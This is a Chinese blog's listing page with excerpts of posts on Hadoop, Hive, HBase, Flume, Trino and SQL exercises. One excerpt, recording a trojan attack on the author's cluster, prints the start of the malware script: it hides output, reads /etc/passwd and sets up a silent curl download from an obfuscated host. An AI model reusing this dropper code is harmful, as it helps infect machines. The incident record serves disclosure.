- 博客(44)
- 资源 (5)
- 收藏
- 关注
原创 手把手教你监控canal高可用集群的同步进度附实现思路、实现过程和相关的脚本
canal高可用集群我们搭建好了,集群相对来说比较稳定。在实际使用中发生过数据峰值较大、网络带宽不足等原因导致的数据同步延时较大,影响了业务开展。那么咱们有没有办法监控一下cananl的同步进度?附带实现思路,实现步骤和相关脚本
2023-04-14 17:32:06 582 1
原创 手把手教你datart集成hive3.1.2
datart中是没有hive驱动包的,需要我们自己根据hive版本,放入合适驱动包和相关的其他jar包。
2022-09-28 14:36:32 2285
原创 ranger_core_db_mysql.sql file import failed
异常信息:Error executing: CREATE FUNCTION `getXportalUIdByLoginId`(input_val VARCHAR(100)) RETURNS int(11) BEGIN DECLARE myid INT; SELECT x_portal_user.id into myid FROM x_portal_user WHERE x_portal_user.login_id = input_val; RETURN myid; END java.sql.SQLEx
2022-04-01 10:42:12 848
原创 FlinkCDC的2.2.0版本怎么监控库中的所有表,增加新表到已有任务?
FlinkCDC的2.2.0版本怎么监控库中的所有表,增加新表到已有任务?一、监控全表 千呼万唤始出来,之前预告FlinkCDC的2.2.0支持Flink1.14和添加新表,满怀希望!今天一看略显失望,添加新表,不支持动态添加,需要修改tableList之后,从ck中重启,倒是不用重新写新代码了,但是不满足我们目前的需求,失望之一。二是,api改得有点随意了。2.0版本监控全表,tableList不设置就行了 DebeziumSourceFunction<String>
2022-03-29 17:13:32 6720 6
原创 Exception in thread “Thread-6“ java.lang.IllegalStateException: Trying to access closed classloader.
问题:Exception in thread “Thread-6” java.lang.IllegalStateException: Trying to access closed classloader. Please check if you store classloaders directly or indirectly in static fields. If the stacktrace suggests that the leak occurs in a third party librar
2022-03-17 15:34:35 6609
原创 Hive 不同级别日志配置 hive-log4j2.properties
# Licensed to the Apache Software Foundation (ASF) under one# or more contributor license agreements. See the NOTICE file# distributed with this work for additional information# regarding copyright ownership. The ASF licenses this file# to you under
2022-02-08 17:03:24 2289 1
原创 记录一次集群被木马病毒攻击
木马脚本O1W2iZnBuRhYbZy5EhkdHYabZ2gaLFkjexec &>/dev/nullexport PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbind=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) c=$(echo "curl -4fsSLkA- -m200")t=$(echo "fjuoqusekcob5av5rw
2021-12-24 18:00:18 754
原创 定位hdfs文件块异常和修复org.apache.hadoop.hdfs.CannotObtainBlockLengthException Cannot obtain block length for
hadoop定位hdfs文件块异常和修复org.apache.hadoop.hdfs.CannotObtainBlockLengthException: Cannot obtain block length for LocatedBlock一、问题重启hadoop集群之后,执行任务时发生异常异常信息 Error: java.io.IOException: org.apache.hadoop.hdfs.CannotObtainBlockLengthException: Cannot obtain bl
2021-11-25 13:35:10 2006
原创 分区修复失败的问题 FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask
分区修复失败的问题 FAILED: Execution Error, return code 1 from org.apache.hadoop.hive.ql.exec.DDLTask一、问题在把CDH集群上的数据迁移到apache集群上时,遇到错误,记录一下。1.脚本执行的时候报错INFO : Compiling command(queryId=hadoop_20211123141935_050bb456-601d-4f8d-bb3c-0b274461b4f8): msck repair tab
2021-11-23 14:49:02 4936 1
原创 解决 Error: java.io.EOFException: Premature EOF from inputStream 问题
解决 Error: java.io.EOFException: Premature EOF from inputStream 问题一、问题1.问题过程在日志解析任务过程中,突发报错,任务一直都很稳定,怎么回突然报错了呢?心头一紧2.详细错误类型:查看日志发现如下错误21/11/18 14:36:29 INFO mapreduce.Job: Task Id : attempt_1628497295151_1290365_m_000002_2, Status : FAILEDError: java
2021-11-18 15:21:07 1947
原创 flume采集日志 异常停止之后自动重启
由于业务端日志采集格式不规范,经常会产生各种异常导致flume停止工作,如果对这些参数格式一一进行校验,影响采集速度,日志数据有一定的容错性。编一个一个脚本,不断监控flume运行状况,遇到异常,自动重启flume。#!/bin/bash export FLUME_HOME=/opt/flumewhile truedopc=`ps -ef | grep kafka-flume-hdfs.conf | grep -v "grep" | wc -l` if [[ $pc -lt 1 ]]the
2021-10-15 15:57:13 889
原创 linux下查看lzo格式压缩文件的内容
linux下查看lzo格式压缩文件的内容1.安装lzop使用yum安装命令:yum install lzop[root@cm bin]# yum install lzopLoaded plugins: fastestmirror, securitySetting up Install ProcessDetermining fastest mirrorsepel/metalink
2021-07-01 16:11:50 576
原创 Ranger无法连接双主Mysql的问题 This function has none of DETERMINISTIC
解决Ranger无法连接双主Mysql的问题一、问题描述报错信息ERROR 1418 (HY000): This function has none of DETERMINISTIC, NO SQL, or READS SQL DATA in its declaration and binary logging is enabled (you *might* want to use the less safe log_bin_trust_function_creators variable)问题分
2021-06-24 16:31:30 212
原创 修改hbase日志路径
修改hbase日志路径为了方便大数据集群日志管理,需要修改hbase日志路径1.错误示范找到配置文件:log4j.properties修改HBase日志路径vim log4j.properties 修改为hbase.log.dir=/var/log/hbase重启HBase集群什么???!!没有生效2.正确修改查阅官方配置发现需要修改hbase-env.shvim hbase-env.sh相关内容修改为export HBASE_LOG_DIR=/var/log/hbase
2021-06-17 16:08:05 925
原创 高可用Hive配置多客户端 多用户模式
高可用HIve配置多客户端hive高可用搭建完毕了,但是如果想在其他节点连接hive怎么办呢?这个时候我们就需要在其他节点安装hive的客户端高可用hive的搭建参考我的另一篇文章hive高可用搭建1.复制安装文件将hdp14的安装文件复制到要连接hive的节点hdp16[along@hdp14 bigdata]$ scp -r hive along@hdp16:/opt/bigdata/2.修改核心配置连接hdp16,添加配置文件[along@hdp16 hive]$ pwd/op
2021-06-17 12:31:04 655 4
原创 DataGrip连接Presto 详细图文教程
DataGrip连接Presto为了提升即席查询能力,我为公司搭建了Presto集群。使用命令行客户端连接或者yanagishima开源工具连接不太方便。网上的资料不是很多,记录下来,方便需要的同学们。选择Presto的理由:1. Impala Presto 查询性能远远优于hive,可实现秒级查询2. 常规的计算任务,交给hive定时计算,使用Presto或 Impala来处理临时计算需求3. Impala性能稍领先于Presto,Presto在数据源支持上非常丰富4.
2021-06-10 15:13:08 1741 3
原创 即席查询之Trino357编译安装部署 集群启停脚本编写 yanagishima编译包下载
Trino安装部署1.下载安装包当前版本要求jdk11以上下载jdkopen jdk11当前版本不能用,官网推荐使用 Azul Zuluhttps://www.injdk.cn/将zulu11.43.55-ca-jdk11.0.9.1-linux_x64.tar.gz上传到服务器解压到**/opt/bigdata**目录[along@hdp16 resource]$ tar -zxvf zulu11.43.55-ca-jdk11.0.9.1-linux_x64.tar.gz -C /opt/
2021-06-10 13:48:31 1176
原创 大数据集群监控之Zabbix安装(详细教程)
Zabbix安装节点规划进程hdp11节点hdp12节点hdp13zabbix-agent√√√zabbix-server√MySQL√zabbix-web√1.环境准备关闭集群关闭自己集群运行的大数据组件关闭防火墙参考我写的hadoop高可用搭建关闭SELinux参考我写的hadoop高可用搭建数据库安装参考我写的hive高可用搭建设置Xshell打开Xshell窗口,底部设置命令发送到所有会话2.安装yu
2021-06-03 17:41:23 396
原创 HBase2.2.7从源码编译到高可用部署 整合整合Phoenix5.1.0 二级索引 整合hive3.1.2
HBase源码编译与安装配置HBase是一种分布式、可扩展、支持海量数据存储的NoSQL数据库。高可靠/高性能/面向列/可伸缩的分布式文件存储系统。Hbase源码编译1.环境配置jdk,maven安装配置2.下载下载地址:https://hbase.apache.org/downloads.html3.上传解压将下载的源码包上传到/opt/src目录下并解压[root@localhost src]#tar -zxvf hbase-2.2.7-src.tar.gz4.选择hado
2021-05-31 15:02:30 845 1
原创 解决HBase整合Hive时一直连接地址为localhost2181的zookeeper的问题
解决HBase整合Hive时一直连接地址为localhost:2181的zookeeper的问题问题描述我在搭建HBase集群整合hive的时候,hive一直连接本地的zookeeper,而不是连接HBase集群中配置的zk地址1.HBase起初以为HBase中hbase-env.sh 这个配置没有生效,export HBASE_MANAGES_ZK=false反复检查了配置,应该是没有问题2.Hive检查hive中的zookeeper,也是没有问题的。最后发现hbase.zookee
2021-05-31 14:51:13 1950
原创 Apache hive 3.1.2从单机到高可用部署 HiveServer2高可用 Metastore高可用 hive on spark hiveserver2 web UI 高可用集群启动脚本
hive部署下载apache hive 3.1.2http://archive.apache.org/dist/hive/注:先看hive编译文档,使用编译好的安装包进行部署官方的hive3.1.4和sprk3.0.0不兼容,需要重新编译。后面配置hive on spark 可以使用spark2.3.0。而spark2.3.0对应的hadoop版本是2.x。重新编译,参考本人写的另一篇文章hive3.1.4源码编译 兼容spark3.0.0 hive on spark 升级guava版本兼容
2021-05-21 16:34:59 2279 4
原创 hive3.1.4源码编译兼容spark3.0.0 hive on spark hadoop3.x修改源码依赖 步骤详细
hive编译自从CDH宣布收费之后,公司决定使用开源的组件,对现有的大数据集群进行替换。使用hive3.1.2和spark3.0.0配置hive on spark的时候,发现官方下载的hive3.1.2和spark3.0.0不兼容,hive3.1.2对应的版本是spark2.3.0,而spark3.0.0对应的hadoop版本是hadoop2.6或hadoop2.7。所以,如果想要使用高版本的hive和hadoop,我们要重新编译hive,兼容spark3.0.0。目前,有关hive3.1.2编译的
2021-05-21 16:13:35 7136 15
原创 解决hadoop高可用使用start-dfs.sh脚本启动时namenode启动不了的问题
解决hadoop高可用,脚本启动时namenode启动不了的问题在通过使用hadoop提供的脚本 sbin/start-dfs.sh 启动hdfs时,经常发现高可用的namenode之启动了一个查看错误日志发现STARTUP_MSG: Starting NameNodeSTARTUP_MSG: host = hdp14/192.168.204.14STARTUP_MSG: args = []STARTUP_MSG: version = 3.1.4STARTUP_MSG: cla
2021-05-13 16:57:49 3396
原创 解决hadoop执行MapReduce程序时Ha和yarn的冲突 YarnRuntimeException: java.lang.NullPointerException
解决hadoop执行MapReduce程序时Ha和yarn的冲突错误信息:YarnRuntimeException: java.lang.NullPointerException在hadoop高可用环境下执行MR程序报如下错误:2020-04-09 22:56:58,827 ERROR [Listener at 0.0.0.0/45871] org.apache.hadoop.mapreduce.v2.app.MRAppMaster: Error starting MRAppMasterorg.ap
2021-05-13 15:25:20 1084 1
原创 hadoop 如何判断文件是否存在,目录是否存在,目录是否为空?
hadoop 如何判断文件是否存在,目录是否存在,目录是否为空?之前在做日志收集的时候遇见一个问题,一直没有解决,今天偶然间想起来这个问题解决一下。将hdfs上的日志数据使用load命令加载到hive表中时,极少数情况下当某种日志缺失的时候,这种日志对应的路径为空,加载的时候会中断调度任务。在Linux文件系统中,可以使用下面的Shell脚本判断某个文件是否存在:# 这里的-f参数判断$file是否存在 if [ ! -f "$file" ]; then echo "文件不存在!"fi
2021-05-12 18:02:31 4763
转载 MySQL生成整年日期表(不用函数和存储过程)
转载自https://blog.csdn.net/ZZQHELLO2018/article/details/105227714-- 创建小数据表 0-9DROP TABLE IF EXISTS aa_numbers_small;CREATE TABLE aa_numbers_small( number INT);--插入数据INSERT INTO aa_numbers_small VALUES(0),(1),(2),(3),(4),(5),(6),(7),(8),(9);SELECT
2021-05-11 17:41:51 840
原创 SecondaryNameNode与Hadoop高可用(HA)的区别
一、SecondaryNameNode介绍要了解Secondary NameNode之前,我们先来看看NameNode是做什么的。NameNodeNameNode:主要用来保存HDFS的元数据信息,比如命名空间信息,块信息等。当它运行的时候,这些信息在内存,也可以持久化到磁盘上。如果存储在NameNode节点的磁盘中,因为经常需要进行随机访问,还有响应客户请求,必然是效率过低。因此,元数据需要存放在内存中。但如果只存在内存中,一旦断电,元数据丢失,整个集群就无法工作了。因此产生在磁盘中备份元数据的Fs
2021-05-08 17:05:25 604
转载 hadoop 高可用(HA)原理 详细图解
hadoop 高可用(HA)原理一、Hadoop 系统架构1.1 Hadoop1.x和Hadoop2.x 架构在介绍HA之前,我们先来看下Hadoop的系统架构,这对于理解HA是至关重要的。Hadoop 1.x之前,其官方架构如图1所示:图1.Hadoop 1.x架构图从图中可看出,1.x版本之前只有一个Namenode,所有元数据由惟一的Namenode负责管理,可想而之当这个NameNode挂掉时整个集群基本也就不可用。Hadoop 2.x的架构与1.x有什么区别呢。我们来看下2.x的架构
2021-05-08 15:52:12 2825
原创 hadoop3.1.4 完全分布式搭建HA(namenode resourcemanager高可用)保姆级教程-详细步骤-快速搭建-详解配置-历史服务器
一. 集群规划ip主机名安装进程192.168.204.14hdp14namenode,ZKFC,resourcemanager192.168.204.15hdp15namenode,ZKFC,resourcemanager192.168.204.16hdp16natanode,nodemanager,zookeeper,Journalnode192.168.204.17hdp17natanode,nodemanager,zookeeper,Jour
2021-05-08 14:25:43 1397
原创 linux下对Hadoop3.1.4源码编译(详细步骤,附所有资源下载地址)
Hadoop源码编译环境准备1.系统环境虚拟机安装 centos7已配置好网卡,能联网root用户安装2.软件安装包下载jdk8下载地址https://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.htmlhadoop-3.1.4-src.tar.gz 源码下载https://hadoop.apache.org/releases.htmlapache-maven-3.6.3
2021-05-06 16:28:59 1620
原创 leetcode-mysql(八) 183. 从不订购的客户 2种思路分析
183. 从不订购的客户难度简单SQL架构某网站包含两个表,Customers 表和 Orders 表。编写一个 SQL 查询,找出所有从不订购任何东西的客户。Customers 表:+----+-------+| Id | Name |+----+-------+| 1 | Joe || 2 | Henry || 3 | Sam || 4 | Max |+----+-------+Orders 表:+----+------------+| Id | C
2021-04-30 11:51:46 179
原创 leetcode-mysql(七) 182.查找重复的电子邮箱 2种思路分析
182. 查找重复的电子邮箱难度简单SQL架构编写一个 SQL 查询,查找 Person 表中所有重复的电子邮箱。示例:+----+---------+| Id | Email |+----+---------+| 1 | a@b.com || 2 | c@d.com || 3 | a@b.com |+----+---------+根据以上输入,你的查询应返回以下结果:+---------+| Email |+---------+| a@b.com |+--
2021-04-30 11:47:11 381
原创 leetcode-mysql(六) 超过经理收入的员工 2种思路分析
leetcode-mysql(六) 超过经理收入的员工 2种思路分析181. 超过经理收入的员工难度简单SQL架构Employee 表包含所有员工,他们的经理也属于员工。每个员工都有一个 Id,此外还有一列对应员工的经理的 Id。+----+-------+--------+-----------+| Id | Name | Salary | ManagerId |+----+-------+--------+-----------+| 1 | Joe | 70000 | 3
2021-04-29 15:06:19 91
原创 leetcode-mysql(五) 180. 连续出现的数字 3种思路详细分析
leetcode-mysql(五) 180. 连续出现的数字 3种思路详细分析180. 连续出现的数字难度中等SQL架构编写一个 SQL 查询,查找所有至少连续出现三次的数字。+----+-----+| Id | Num |+----+-----+| 1 | 1 || 2 | 1 || 3 | 1 || 4 | 2 || 5 | 1 || 6 | 2 || 7 | 2 |+----+-----+例如,给定上面的 Logs 表, 1
2021-04-29 14:09:27 285
原创 leetcode-mysql(四) 178分数排名 2种思路详细分析
leetcode 分数排名 2种思路分析178. 分数排名难度中等SQL架构编写一个 SQL 查询来实现分数排名。如果两个分数相同,则两个分数排名(Rank)相同。请注意,平分后的下一个名次应该是下一个连续的整数值。换句话说,名次之间不应该有“间隔”。+----+-------+| Id | Score |+----+-------+| 1 | 3.50 || 2 | 3.65 || 3 | 4.00 || 4 | 3.85 || 5 | 4.00 || 6
2021-04-28 15:41:13 288 1
原创 DolphinScheduler里Zookeeper监控页面里显示的数据全是-1 (已解决)
DolphinScheduler里Zookeeper监控页面里显示的数据全是-1 (已解决)如图中所示,Zookeeper的监控内容没有显示。之后我做了如下验证:Zookeeper相关的配置也没有问题能正常连接上Zookeeper集群的高可以经过验证也是可以的调整日志级别后,查看不到调用监控信息的详细日志打开开发者模式,也没有详细的日志通过社区问答,找到类似相关问题,采用方案:https://ask.csdn.net/questions/4645752?answer=29328783
2021-04-28 10:04:05 1303 2
转载 leetcode-mysql(三) 177.第N高的薪水 6种解析思路详细分析
177. 第N高的薪水作者:luanhz链接:https://leetcode-cn.com/problems/nth-highest-salary/solution/mysql-zi-ding-yi-bian-liang-by-luanz/来源:力扣(LeetCode)难度中等编写一个 SQL 查询,获取 Employee 表中第 n 高的薪水(Salary)。+----+--------+| Id | Salary |+----+--------+| 1 | 100 || 2
2021-04-27 18:19:22 413
转载 kafka重新设置consumer group的offset
kafka重新设置group的offset转自https://www.cnblogs.com/8765h/p/12233576.html 使用Kafka自带的kafka-consumer-groups.sh脚本可随意设置消费者组(consumer group),这是0.11.0.0版本提供的新功能,设置的前提是:consumer group状态是inactive的,即不能是处于正在工作中的状态。重设位移的流程由下面3步组成:1、确定位移重设策略——当前支持8种设置规则:–to-earli
2021-04-22 15:46:13 2041
yanagishima-22.0-build.zip
2021-06-24
yanagishima-18.0.rar
2021-06-10
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人